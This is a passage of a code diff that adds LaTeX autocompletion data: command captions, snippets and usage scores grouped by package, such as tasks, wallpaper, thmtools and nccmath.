0.008565354665444157, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'zref-user-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-user-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-user-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'zref-user-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'zref-user-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-user-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-user-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-user-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'zref-user-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-user-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-user-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-user-cmd', + score: 0.002958865219480927, + }, + ], + 'zref-abspage': [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-abspage-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'zref-abspage-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'zref-abspage-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'zref-abspage-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'zref-abspage-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-abspage-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-abspage-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-abspage-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-abspage-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'zref-abspage-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'zref-abspage-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-abspage-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-abspage-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'zref-abspage-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-abspage-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-abspage-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'zref-abspage-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'zref-abspage-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-abspage-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-abspage-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-abspage-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'zref-abspage-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-abspage-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-abspage-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-abspage-cmd', + score: 0.002958865219480927, + }, + ], + quotchap: [ + { + caption: '\\chapter{}', + snippet: '\\chapter{$1}', + meta: 'quotchap-cmd', + score: 0.422097569591803, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'quotchap-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'quotchap-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\qauthor{}', + snippet: '\\qauthor{$1}', + meta: 'quotchap-cmd', + score: 0.002335082759143631, + }, + ], + misccorr: [ + { + caption: '\\subsection{}', + snippet: '\\subsection{$1}', + meta: 'misccorr-cmd', + score: 1.3890912739512353, + }, + { + caption: '\\section{}', + snippet: '\\section{$1}', + meta: 'misccorr-cmd', + score: 3.0952612541683835, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'misccorr-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\makelabel', + snippet: '\\makelabel', + meta: 'misccorr-cmd', + score: 5.739925426740175e-5, + }, + { + caption: '\\makelabel{}', + snippet: '\\makelabel{$1}', + meta: 'misccorr-cmd', + score: 5.739925426740175e-5, + }, + { + caption: '\\makelabel[]{}', + snippet: '\\makelabel[$1]{$2}', + meta: 'misccorr-cmd', + score: 5.739925426740175e-5, + }, + { + caption: '\\frak{}', + snippet: '\\frak{$1}', + meta: 'misccorr-cmd', + score: 0.0017966000518546787, + }, + { + caption: '\\checkmark', + snippet: '\\checkmark', + meta: 'misccorr-cmd', + score: 0.025060530944368123, + }, + { + caption: '\\bold', + snippet: '\\bold', + meta: 'misccorr-cmd', + score: 0.0014358547624941567, + }, + { + caption: '\\bold{}', + snippet: '\\bold{$1}', + meta: 'misccorr-cmd', + score: 0.0014358547624941567, + }, + { + caption: '\\Bbb{}', + snippet: '\\Bbb{$1}', + meta: 'misccorr-cmd', + score: 0.0006671850995492977, + }, + { + caption: '\\Bbb', + snippet: '\\Bbb', + meta: 'misccorr-cmd', + score: 0.0006671850995492977, + }, + ], + academicons: [ + { + caption: '\\aiResearchGateSquare', + snippet: '\\aiResearchGateSquare', + meta: 'academicons-cmd', + score: 0.0005747853176838451, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'academicons-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'academicons-cmd', + score: 0.2864294797053033, + }, + ], + tasks: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tasks-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tasks-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tasks-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tasks-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tasks-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tasks-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tasks-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tasks-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tasks-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tasks-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tasks-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tasks-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tasks-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'tasks-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'tasks-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'tasks-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'tasks-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'tasks-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'tasks-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'tasks-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'tasks-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'tasks-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'tasks-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'tasks-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'tasks-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'tasks-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'tasks-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'tasks-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'tasks-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tasks-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'tasks-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'tasks-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'tasks-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'tasks-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tasks-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tasks-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tasks-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tasks-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tasks-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tasks-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tasks-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tasks-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tasks-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tasks-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tasks-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tasks-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tasks-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tasks-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tasks-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tasks-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tasks-cmd', + score: 0.2864294797053033, + }, + ], + 'pstricks-add': [ + { + caption: '\\green', + snippet: '\\green', + meta: 'pstricks-add-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'pstricks-add-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'pstricks-add-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'pstricks-add-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'pstricks-add-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'pstricks-add-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'pstricks-add-cmd', + score: 0.006520475264573554, + }, + ], + extramarks: [ + { + caption: '\\leftmark', + snippet: '\\leftmark', + meta: 'extramarks-cmd', + score: 0.01094124445235767, + }, + { + caption: '\\extramarks{}{}', + snippet: '\\extramarks{$1}{$2}', + meta: 'extramarks-cmd', + score: 0.0003269562507660904, + }, + { + caption: '\\markboth{}{}', + snippet: '\\markboth{$1}{$2}', + meta: 'extramarks-cmd', + score: 0.038323601301945065, + }, + { + caption: '\\markboth{}', + snippet: '\\markboth{$1}', + meta: 'extramarks-cmd', + score: 0.038323601301945065, + }, + { + caption: '\\markright{}', + snippet: '\\markright{$1}', + meta: 'extramarks-cmd', + score: 0.007138622674767024, + }, + { + caption: '\\markright{}{}', + snippet: '\\markright{$1}{$2}', + meta: 'extramarks-cmd', + score: 0.007138622674767024, + }, + { + caption: '\\rightmark', + snippet: '\\rightmark', + meta: 'extramarks-cmd', + score: 0.008472328846194114, + }, + ], + calrsfs: [ + { + caption: '\\mathcal{}', + snippet: '\\mathcal{$1}', + meta: 'calrsfs-cmd', + score: 0.35084018920966636, + }, + ], + newlfont: [ + { + caption: '\\em', + snippet: '\\em', + meta: 'newlfont-cmd', + score: 0.10357353994640862, + }, + ], + mdwtab: [ + { + caption: '\\cline{}', + snippet: '\\cline{$1}', + meta: 'mdwtab-cmd', + score: 0.07276573550543858, + }, + { + caption: '\\hline', + snippet: '\\hline', + meta: 'mdwtab-cmd', + score: 1.3209538327406387, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'mdwtab-cmd', + score: 0.5473606021405326, + }, + ], + mdwmath: [ + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'mdwmath-cmd', + score: 0.04318078602869565, + }, + ], + wallpaper: [ + { + caption: '\\CenterWallPaper{}{}', + snippet: '\\CenterWallPaper{$1}{$2}', + meta: 'wallpaper-cmd', + score: 0.00042983945496357105, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'wallpaper-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'wallpaper-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'wallpaper-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'wallpaper-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'wallpaper-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'wallpaper-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'wallpaper-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'wallpaper-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'wallpaper-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'wallpaper-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'wallpaper-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'wallpaper-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'wallpaper-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'wallpaper-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'wallpaper-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'wallpaper-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\AddToShipoutPictureFG{}', + snippet: '\\AddToShipoutPictureFG{$1}', + meta: 'wallpaper-cmd', + score: 0.000325977535138643, + }, + { + caption: '\\AddToShipoutPictureBG{}', + snippet: '\\AddToShipoutPictureBG{$1}', + meta: 'wallpaper-cmd', + score: 0.0008957666085644653, + }, + { + caption: '\\AtPageUpperLeft{}', + snippet: '\\AtPageUpperLeft{$1}', + meta: 'wallpaper-cmd', + score: 0.0003608141410278152, + }, + { + caption: '\\LenToUnit{}', + snippet: '\\LenToUnit{$1}', + meta: 'wallpaper-cmd', + score: 0.0007216282820556304, + }, + { + caption: '\\AddToShipoutPicture{}', + snippet: '\\AddToShipoutPicture{$1}', + meta: 'wallpaper-cmd', + score: 0.0017658629469099734, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'wallpaper-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'wallpaper-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'wallpaper-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'wallpaper-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'wallpaper-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'wallpaper-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'wallpaper-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'wallpaper-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'wallpaper-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'wallpaper-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'wallpaper-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'wallpaper-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'wallpaper-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'wallpaper-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'wallpaper-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'wallpaper-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'wallpaper-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'wallpaper-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'wallpaper-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'wallpaper-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'wallpaper-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'wallpaper-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'wallpaper-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'wallpaper-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'wallpaper-cmd', + score: 0.008565354665444157, + }, + ], + newunicodechar: [ + { + caption: '\\newunicodechar{}{}', + snippet: '\\newunicodechar{$1}{$2}', + meta: 'newunicodechar-cmd', + score: 8.718084183564492e-5, + }, + ], + thmtools: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'thmtools-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\listtheoremname', + snippet: '\\listtheoremname', + meta: 'thmtools-cmd', + score: 1.9443373798666845e-5, + }, + { + caption: '\\thmtformatoptarg', + snippet: '\\thmtformatoptarg', + meta: 'thmtools-cmd', + score: 6.353668036093916e-5, + }, + { + caption: '\\listoftheorems[]', + snippet: '\\listoftheorems[$1]', + meta: 'thmtools-cmd', + score: 1.9443373798666845e-5, + }, + { + caption: '\\declaretheoremstyle[]{}', + snippet: '\\declaretheoremstyle[$1]{$2}', + meta: 'thmtools-cmd', + score: 0.0001168034231635369, + }, + { + caption: '\\declaretheorem[]{}', + snippet: '\\declaretheorem[$1]{$2}', + meta: 'thmtools-cmd', + score: 0.0004904790216915127, + }, + { + caption: '\\theoremstyle{}', + snippet: '\\theoremstyle{$1}', + meta: 'thmtools-cmd', + score: 0.02533412165007986, + }, + { + caption: '\\proof{}', + snippet: '\\proof{$1}', + meta: 'thmtools-cmd', + score: 0.000701497773639073, + }, + { + caption: '\\proof', + snippet: '\\proof', + meta: 'thmtools-cmd', + score: 0.000701497773639073, + }, + { + caption: '\\newtheorem{}[]{}', + snippet: '\\newtheorem{$1}[$2]{$3}', + meta: 'thmtools-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}', + snippet: '\\newtheorem{$1}{$2}', + meta: 'thmtools-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}[]', + snippet: '\\newtheorem{$1}{$2}[$3]', + meta: 'thmtools-cmd', + score: 0.215689795055434, + }, + { + caption: '\\endproof', + snippet: '\\endproof', + meta: 'thmtools-cmd', + score: 0.0006133100544751855, + }, + { + caption: '\\endproof{}', + snippet: '\\endproof{$1}', + meta: 'thmtools-cmd', + score: 0.0006133100544751855, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'thmtools-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'thmtools-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'thmtools-cmd', + score: 0.008565354665444157, + }, + ], + nccmath: [ + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'nccmath-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'nccmath-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'nccmath-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'nccmath-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'nccmath-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'nccmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'nccmath-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'nccmath-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'nccmath-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'nccmath-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'nccmath-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'nccmath-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'nccmath-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'nccmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'nccmath-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'nccmath-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'nccmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'nccmath-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'nccmath-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'nccmath-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'nccmath-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'nccmath-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'nccmath-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'nccmath-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'nccmath-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'nccmath-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'nccmath-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'nccmath-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'nccmath-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'nccmath-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'nccmath-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'nccmath-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'nccmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'nccmath-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'nccmath-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'nccmath-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'nccmath-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'nccmath-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'nccmath-cmd', + score: 5.563481971953931e-5, + }, + { + 